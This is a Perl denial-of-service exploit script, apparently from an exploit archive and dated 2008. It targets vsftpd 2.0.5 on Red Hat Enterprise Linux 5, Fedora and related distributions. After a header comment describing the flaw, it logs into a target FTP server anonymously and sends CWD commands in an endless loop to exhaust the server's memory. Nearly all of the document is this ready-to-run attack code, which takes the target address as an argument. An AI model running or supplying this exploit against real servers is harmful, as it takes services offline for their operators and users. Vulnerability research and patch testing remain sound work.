vsftpd version 2.0.5 remote post-auth memory consumption exploit.
412e80627debde564746319d85435b636164aa46ea8352581e228e4ee5c8fc7b
#!/usr/bin/perl -w
#######################################################################################
# vsftpd 2.0.5 FTP Server on Red Hat Enterprise Linux (RHEL) 5, Fedora 6 to 8,
# Foresight Linux, rPath Linux is prone to Denial-of-Service(DoS) vulnerability.
#
# Can be xploited by large number of CWD commands to vsftp daemon with deny_file configuration
# option in /etc/vsftpd/vsftpd.conf or the path where FTP server is installed.
#
# I tried to modify local exploit found at securityfocus such that we can remotely exloit
#
# Author shall not bear any responsibility
# Author: Praveen Darshanam
# Email: praveen[underscore]recker[at]sify.com
# Date: 07th June, 2008
#
#
########################################################################################
use Net::FTP;
$ftp=Net::FTP->new("$ARGV[0]",Debug=>0) || die "Cannot connect to Host $ARGV[0]\n Usage: $perl script_name.pl target_ip\n";
$ftp -> login("anonymous","anonymous") || die "Could not Login...Retry";
while(1)
{
#this loop runs infinitely
$ftp -> cwd();
}
$ftp->quit;